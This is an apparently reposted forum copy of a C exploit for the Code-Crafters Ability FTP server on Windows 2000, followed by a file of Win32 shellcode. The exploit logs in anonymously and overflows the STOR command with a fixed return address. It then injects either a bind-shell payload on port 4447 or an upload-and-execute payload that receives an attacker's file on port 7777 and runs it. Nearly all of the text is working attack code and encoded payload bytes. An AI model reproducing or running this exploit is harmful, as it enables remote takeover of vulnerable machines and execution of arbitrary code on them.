文章作者:oxff[!!at!!]pixel-house.net
复制内容到剪贴板
代码:
/*
*
* 'Code-Crafters Ability Webserver' FTPd Exploit
* Written by OxFF <oxff[!!at!!]pixel-house.net> from IngleWood
*
* Dedicated to all those IngleWood people, you know you rock!
*
* Do me a favour and stop trolling on Full-Disclosure Mailing list.
*
*/
#include <winsock.h>
#include <stdio.h>
#include "shellcode.h"
#define COMPILE_STANDALONE
// inside mfc dll on win2k sp4
// if you find universal address, _CONTACT ME_
#define EIP 0x6C2E9623
inline int GetFtpCode(SOCKET sckConn, char * szBuffer, unsigned int nBuffSize)
{
int iRead = recv(sckConn, szBuffer, nBuffSize, 0);
int iCode;
if(iRead <= 0)
return 0;
iCode = atoi(szBuffer);
while(true)
{ // empty queue
TIMEVAL tvTimeOut = { 0, 500 };
fd_set fdSet;
FD_ZERO(&fdSet);
FD_SET(sckConn, &fdSet);
select(1, &fdSet, 0, 0, &tvTimeOut);
if(!FD_ISSET(sckConn, &fdSet))
break;
iRead = recv(sckConn, szBuffer, nBuffSize, 0);
if(iRead <= 0)
break;
szBuffer[iRead] = 0;
}
return iCode;
}
inline bool SendFtpCommand(SOCKET sckConn, const char * szBuffer)
{
return (send(sckConn, szBuffer, strlen(szBuffer), 0) == strlen(szBuffer));
}
bool Exploit(unsigned long ulTargetHost, int iType)
{
SOCKET sckSocket;
char szBuffer[2048];
{ // connect
SOCKADDR_IN addrTarget;
addrTarget.sin_family = AF_INET;
addrTarget.sin_addr.s_addr = ulTargetHost;
addrTarget.sin_port = htons(21);
if((sckSocket = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
return false;
if(connect(sckSocket, (SOCKADDR * ) &addrTarget, sizeof(addrTarget)) == SOCKET_ERROR)
return false;
}
{ // login
if(GetFtpCode(sckSocket, szBuffer, sizeof(szBuffer)) != 220)
return false;
strncpy(szBuffer, "USER anonymous\r\n", sizeof(szBuffer) - 1);
szBuffer[sizeof(szBuffer) - 1] = 0;
if(!SendFtpCommand(sckSocket, szBuffer))
return false;
if(GetFtpCode(sckSocket, szBuffer, sizeof(szBuffer)) != 331)
return false;
strncpy(szBuffer, "PASS anonymous@\r\n", sizeof(szBuffer) - 1);
szBuffer[sizeof(szBuffer) - 1] = 0;
if(!SendFtpCommand(sckSocket, szBuffer))
return false;
if(GetFtpCode(sckSocket, szBuffer, sizeof(szBuffer)) != 230)
return false;
strncpy(szBuffer, "PASV\r\n", sizeof(szBuffer) - 1);
szBuffer[sizeof(szBuffer) - 1] = 0;
if(!SendFtpCommand(sckSocket, szBuffer))
return false;
if(GetFtpCode(sckSocket, szBuffer, sizeof(szBuffer)) != 227)
return false;
}
{ // build trigger, append shellcode and send to victim
unsigned int nLength;
memcpy(szBuffer, "STOR ", 5);
memset(&szBuffer[5], 'A', 964);
nLength = 5 + 964;
* ((unsigned long *) &szBuffer[nLength]) = EIP;
nLength += 4;
memset(&szBuffer[nLength], 'A', 32);
nLength += 32;
if(iType == 0)
{
memcpy(&szBuffer[nLength], bindcode, sizeof(bindcode) - 1);
nLength += sizeof(bindcode) - 1;
}
else
{
memcpy(&szBuffer[nLength], uploadcode, sizeof(uploadcode) - 1);
nLength += sizeof(uploadcode) - 1;
}
szBuffer[nLength++] = '\r';
szBuffer[nLength++] = '\n';
if(send(sckSocket, szBuffer, nLength, 0) != nLength)
return false;
}
closesocket(sckSocket);
return true;
}
#ifdef COMPILE_STANDALONE
bool StreamFile(unsigned long ulTargetHost, const char * szFile)
{
SOCKADDR_IN addrRemote;
SOCKET sckSocket;
FILE * pFile;
char szBuffer[1024];
addrRemote.sin_family = AF_INET;
addrRemote.sin_addr.s_addr = ulTargetHost;
addrRemote.sin_port = htons(7777); // defined in shellcode
if(!(pFile = fopen(szFile, "rb")))
return false;
if((sckSocket = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
{
fclose(pFile);
return false;
}
if(connect(sckSocket, (SOCKADDR *) &addrRemote, sizeof(addrRemote)) == SOCKET_ERROR)
{
fclose(pFile);
return false;
}
while(!feof(pFile))
if(send(sckSocket, szBuffer, fread(szBuffer, 1, sizeof(szBuffer), pFile), 0) <= 0)
{
fclose(pFile);
return false;
}
closesocket(sckSocket);
fclose(pFile);
return true;
}
int main(int iArgC, char * szArgV[])
{
unsigned long ulTarget;
int iType;
printf("Code-Crafters Ability FTPd Remote Exploit 2.34 / Win2K SPx\t\tby OxFF\tof IngleWood\n ~ either creates bindshell on port 4447\n ~ or transmits given file to host and executes it there\n\n");
if(iArgC < 2 || iArgC > 3)
{
printf("Usage: %s <target-host> [transmit-and-execute-file]\n", szArgV[0]);
return 0;
}
if(iArgC == 3)
iType = 1;
else
iType = 0;
{
WSADATA wdData;
WSAStartup(MAKEWORD(2, 2), &wdData);
}
if(iType == 1)
{ // ensure file exists
FILE * pFile;
if(!(pFile = fopen(szArgV[2], "rb")))
{
printf("[-] could not open %s for reading\n", szArgV[2]);
return 1;
}
fclose(pFile);
}
{
HOSTENT * pHost;
if(!(pHost = gethostbyname(szArgV[1])))
{
printf("[-] could not resolve %s\n", szArgV[1]);
return 1;
}
ulTarget = * ((unsigned long *) * pHost->h_addr_list);
}
printf("[+] starting %s exploit against %s:21\n", (iType == 0 ? "bindshell" : "upload 'n' execute"), szArgV[1]);
if(!Exploit(ulTarget, iType))
printf("[-] exploit failed\n");
else
printf("[+] exploit successful\n");
if(iType == 1)
{
Sleep(1000);
if(StreamFile(ulTarget, szArgV[2]))
printf("[+] streamed file %s to target host\n", szArgV[2]);
else
printf("[-] streaming %s failed\n", szArgV[2]);
}
return 0;
}
#endif // COMPILE_STANDALONE补充:
复制内容到剪贴板
代码:
/*
*
* Universal Win32 Shellcodes
* Collected and modified by OxFF <oxff[!!at!!]pixel-house.net> from IngleWood
*
* Dedicated to all those IngleWood people, you know you rock!
*
* Do me a favour and stop trolling on Full-Disclosure Mailing list.
*
*/
/* win32_bind - Encoded Shellcode [\x00] [ EXITFUNC=thread LPORT=4447 Size=399 ] [url]http://metasploit.com[/url] */
char bindcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x73\x17\x12\x45"
"\xc1\xf8\x83\xeb\xfc\xe2\xf4\xee\xad\x97\xf8\x12\x45\x92\xad\x44"
"\x12\x4a\x94\x36\x5d\x4a\xbd\x2e\xce\x95\xfd\x6a\x44\x2b\x73\x58"
"\x5d\x4a\xa2\x32\x44\x2a\x1b\x20\x0c\x4a\xcc\x99\x44\x2f\xc9\xed"
"\xb9\xf0\x38\xbe\x7d\x21\x8c\x15\x84\x0e\xf5\x13\x82\x2a\x0a\x29"
"\x39\xe5\xec\x67\xa4\x4a\xa2\x36\x44\x2a\x9e\x99\x49\x8a\x73\x48"
"\x59\xc0\x13\x99\x41\x4a\xf9\xfa\xae\xc3\xc9\xd2\x1a\x9f\xa5\x49"
"\x87\xc9\xf8\x4c\x2f\xf1\xa1\x76\xce\xd8\x73\x49\x49\x4a\xa3\x0e"
"\xce\xda\x73\x49\x4d\x92\x90\x9c\x0b\xcf\x14\xed\x93\x48\x3f\x93"
"\xa9\xc1\xf9\x12\x45\x96\xae\x41\xcc\x24\x10\x35\x45\xc1\xf8\x82"
"\x44\xc1\xf8\xa4\x5c\xd9\x1f\xb6\x5c\xb1\x11\xf7\x0c\x47\xb1\xb6"
"\x5f\xb1\x3f\xb6\xe8\xef\x11\xcb\x4c\x34\x55\xd9\xa8\x3d\xc3\x45"
"\x16\xf3\xa7\x21\x77\xc1\xa3\x9f\x0e\xe1\xa9\xed\x92\x48\x27\x9b"
"\x86\x4c\x8d\x06\x2f\xc6\xa1\x43\x16\x3e\xcc\x9d\xba\x94\xfc\x4b"
"\xcc\xc5\x76\xf0\xb7\xea\xdf\x46\xba\xf6\x07\x47\x75\xf0\x38\x42"
"\x15\x91\xa8\x52\x15\x81\xa8\xed\x10\xed\x71\xd5\x74\x1a\xab\x41"
"\x2d\xc3\xf8\x03\x1a\x48\x18\x78\x55\x91\xaf\xed\x10\xe5\xab\x45"
"\xba\x94\xd0\x41\x11\x96\x07\x47\x65\x48\x3f\x7a\x06\x8c\xbc\x12"
"\xcc\x22\x7f\xe8\x74\x01\x75\x6e\x61\x6d\x92\x07\x1c\x32\x53\x95"
"\xbf\x42\x14\x46\x83\x85\xdc\x02\x01\xa7\x3f\x56\x61\xfd\xf9\x13"
"\xcc\xbd\xdc\x5a\xcc\xbd\xdc\x5e\xcc\xbd\xdc\x42\xc8\x85\xdc\x02"
"\x11\x91\xa9\x43\x14\x80\xa9\x5b\x14\x90\xab\x43\xba\xb4\xf8\x7a"
"\x37\x3f\x4b\x04\xba\x94\xfc\xed\x95\x48\x1e\xed\x30\xc1\x90\xbf"
"\x9c\xc4\x36\xed\x10\xc5\x71\xd1\x2f\x3e\x07\x24\xba\x12\x07\x67"
"\x45\xa9\x17\xdc\xa5\xa1\x07\x47\x41\xf0\x23\x41\xba\x11\xf8";
// [url]http://www.packetstormsecurity.com/shellcode/upload-exec-shellcode.c[/url]
// modified version, if you want the source, contact me
char uploadcode[] =
"\xEB\x0F\x58\x31\xC9\x66\xB9\xB0\x01\x80\x30\x80\x40\xE2\xFA\xEB\x05"
"\xE8\xEC\xFF\xFF\xFF\x68\xC7\x80\x80\x80\x59\x89\x75\x2D\x4B\x6D\x7C"
"\xBB\x24\x9A\xF0\x47\x24\x2D\xAE\x69\x65\xC9\x06\xC9\x36\x99\x98\x67"
"\x67\xF9\x46\xF9\xFE\x58\x62\xF3\x18\x7E\x0A\x8E\x25\x97\x80\xFC\x9F"
"\xF9\x8A\x68\x7B\x17\x7D\x8F\xD7\xD3\xB2\xDF\xB3\xB2\xAE\xC4\xCC\xCC"
"\x80\xF2\xE7\xF3\xF2\xF6\xB3\xB2\xAE\xE5\xF8\xE5\x80\xDB\xD5\x09\x65"
"\xE6\x01\x6C\xB4\x80\x09\x66\xE6\x01\x6C\x8C\x80\x68\x5B\x80\x80\x80"
"\x09\x47\xD7\xE8\x0E\xCE\x8E\x6C\x68\x67\x80\x80\x80\x09\xC5\x88\x0D"
"\xD3\xB0\xD2\x7F\xD5\x88\x09\xC5\x88\x0D\xD3\xBB\x09\xD6\xB4\xEA\x8D"
"\xD9\xE6\x01\x79\x87\x80\xF5\x83\x0B\xFD\x88\x09\x8E\xD7\x7F\xF4\x0B"
"\x7C\x68\x3B\x80\x80\x80\x0B\x8E\x09\xC4\x0E\x7C\x62\x62\xE6\x01\x6C"
"\x10\x81\xD4\xE8\x81\x81\x80\x80\x7F\xD6\x84\xB1\x7F\xD7\xD7\xD7\xD7"
"\xC7\xD7\xC7\xD7\x7F\x96\x09\x43\xB1\x7F\xD7\xD7\xE8\x82\x80\x9E\xE1"
"\x09\x62\xEA\x90\xD2\xD3\x7F\xD6\x88\xD7\xD3\x7F\xD6\x8C\xD7\xD6\xD3"
"\x7F\xD6\x90\x09\x43\xEA\x80\xEA\x86\xEA\x84\xEA\x80\xEA\x87\xE8\x80"
"\x80\x80\x60\x7F\xF6\xB4\x7F\xD6\xA4\x09\x47\x01\x6C\x1C\x7F\x7F\x7F"
"\x09\x65\x0D\xD5\xE4\xEA\x80\xE8\xE4\x80\x80\x80\xD2\xD3\x7F\xD6\x94"
"\xBD\x7F\x7F\x7F\x7F\xF4\x95\xBD\x80\x80\x80\x80\xF4\x8E\x0D\xD5\xE4"
"\xEA\x80\xD1\xD0\xD2\xD7\x7F\xD6\xA8\x6B\x55\xD7\x7F\xD6\xAC\xE8\x85"
"\x80\x80\x80\x7F\xF6\xB4\x7F\xD6\xA0\xB1\x7F\xD7\x7F\xD6\x9C\xD5\xD6"
"\xE4\x21\xB0\x80\x80\x80\x0B\xC0\x8C\x0B\xF0\x9C\x2D\x0B\xE8\x88\x09"
"\x68\xDE\xDD\x42\x84\x80\xD3\xD5\xD6\xD7\x0B\xEC\xA4\x98\x0B\xC5\xBC"
"\x0B\xD4\x85\xF8\x81\x6A\x0B\xCA\x98\x0B\xDA\xA0\x81\x6B\x63\xB5\xC9"
"\x0B\xB4\x0B\x81\x6E\xB1\x7F\x7C\xB1\x40\x2C\xB8\x60\xF4\x87\x41\x4F"
"\x8D\x81\x47\x6B\x72\xBB\xFC\xA4\x94\xF5\x61\x0B\xDA\xA4\x81\x6B\xE6"
"\x0B\x8C\xCB\x0B\xDA\x9C\x81\x6B\x0B\x84\x0B\x81\x68\x69\x82\x80\x80"
"\x80\xB1\x40\x09\x6A\xDF\xDE\xDD\xDB\x42\x84\x80";
